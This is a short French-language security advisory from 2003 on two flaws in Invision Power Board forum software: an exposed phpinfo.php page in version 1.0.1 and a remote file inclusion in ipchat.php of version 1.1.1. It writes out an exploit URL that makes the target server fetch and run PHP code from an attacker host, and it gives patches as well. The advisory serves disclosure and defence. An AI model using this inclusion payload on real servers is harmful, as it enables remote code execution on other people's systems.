Invision Power Board ******************** Informations : °°°°°°°°°°°°°° Langage : PHP Website : http://www.invisionboard.com -------------------------- Version : 1.0.1 Problème : phpinfo() -------------------------- Version : 1.1.1 Problème : Inclusion de fichier Developpement : °°°°°°°°°°°°°°° Invision Power Board est un forum très complet comprenant une partie admin, une gestion de droits (modérateur,...), une partie membre, une liste membre, un fichier d'aide, un affichage et un gestion de profils, un Messenger, la gestions d' "amis",... Dans la version 1.0.1 on retrouve une faille relativement classique, c'est l'affichage pour tous du résultat de l'execution de la commande phpinfo();, qui contient une faille Cross Site Scripting et révèle énormement d'informations sur l'ordinateur, le serveur ou la configuration PHP. Ce code se trouve dans le fichier phpinfo.php : ---------- ---------- Il suffira donc d'y accèder avec une url du type http://[target]/phpinfo.php . Dans la dernière version de ce forum à cette date, la 1.1.1, un nouveau fichier fait son apparition : le fichier ipchat.php. Dans ce fichier on peut voir comme première ligne de code : ------------------------------------- require $root_path."conf_global.php"; ------------------------------------- Ce code n'est une faille que si register_globals=ON. Si la configuration est bien 'favorable' au hacker, un fichier exterieur au serveur peut être inclut et executé comme du code php dans ipchat.php, par le serveur et avec ses droits et restrictions. Par exemple l'url : http://[target]/ipchat.php?root_path=http://[attacker]/ inclura et executera le fichier : http://[attacker]/conf_global.php dans : http://[target]/ipchat.php Solutions : °°°°°°°°°°° Pour la version 1.0.1, simplement supprimer le fichier phpinfo.php. Pour la version 1.1.1, il suffira de mettre comme première ligne dans le fichier ipchat.php le code : ------------------ $root_path = "./"; ------------------ Des patchs peuvent être trouvés sur http://www.phpsecure.org. Credits : °°°°°°°°° Auteur : frog-m@n E-mail : frog-man@frog-man.org Website : http://www.phpsecure.org Date : 27/02/03